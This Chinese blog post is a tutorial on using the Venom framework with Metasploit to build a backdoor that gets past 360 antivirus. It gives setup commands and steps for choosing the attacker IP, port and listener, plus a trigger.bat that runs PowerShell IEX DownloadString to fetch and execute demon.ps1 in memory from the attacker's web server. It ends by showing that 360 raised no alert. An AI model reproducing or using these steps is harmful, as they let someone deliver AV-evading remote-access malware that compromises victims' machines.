Venom 结合 Metasploit绕过360

下载安装

下载地址:https://github.com/r00t-3xp10it/venom

1.从Github上下载框架,你可以下载到以下格式:

tar.gz OR zip OR git clone

2.赋予文件可执行权限:

cd venom-main

sudo chmod -R +x *.sh

sudo chmod -R +x *.py

3.安装依赖关系包:

cd aux

sudo ./setup.sh

4.运行

sudo ./venom.sh

使用步骤:

1.上图这里的模块比较多有 apk(安卓)/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:


2. 填写攻击者的 IP 以及 端口


3.填写 后门名称


4. 填写后门 监听模块类型


4. 查看 outoput 输出文件。

5.这里选择 msf 的后门模块,选择完后会自动帮你设置相关参数,—-更加自动化懒人化


6.我们这里只需要 trigger.bat 文件,到目标系统运行一次即可!

在此之前,我们简单查看下 bat 文件的内容。这里需要我们把 xxxx.ps1 文件,放到 web 服务器上。 让 powershell 去远程下载木马文件。

:: powershell template | Author: r00t-3xp10it

:: Matthew Graeber - DownloadString

:: Download/execute payload in RAM

:: ---

@echo off

echo [*] Please wait, preparing software ...

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.149/demon.ps1')

7.开启 kali 下的 apache 服务,将 xxxx.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址。

service apache2 start

8.准备工作完成,将 trigger.bat 文件丢到目标系统,可以尝试使用 360 扫描检查。可以看到,360 并未做任何拦截及报毒

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • 免杀powershell 绕过 小白看了各种大佬做的免杀文章感觉太神奇了,于是自己也做了一个………….有点low,...
    F1_bd2c阅读 9,483评论 1 10
  • 进入带空格的文件或者文件夹 Linux文件权限详解 文件和目录权限概述 在linux中的每一个文件或目录都包含有访...
    annkee阅读 7,648评论 0 4
  • 6月7日,莘莘学子高考的日子,2018年6月7日,我高考10周年的日子。再次感觉到了岁月如梭。 很高兴开头用对了“...
    dc的梦呓阅读 1,540评论 0 1
  • https://github.com/kdn251/interviews https://github.com/c...
    dubingxin阅读 1,040评论 0 0
  • 2019年就剩两天了,2020年的你我距离那一天,过去了9年。 2019初的冬天,我还在怀疑是不是重新开始了,站在...
    白粥黑糖阅读 832评论 0 0

友情链接更多精彩内容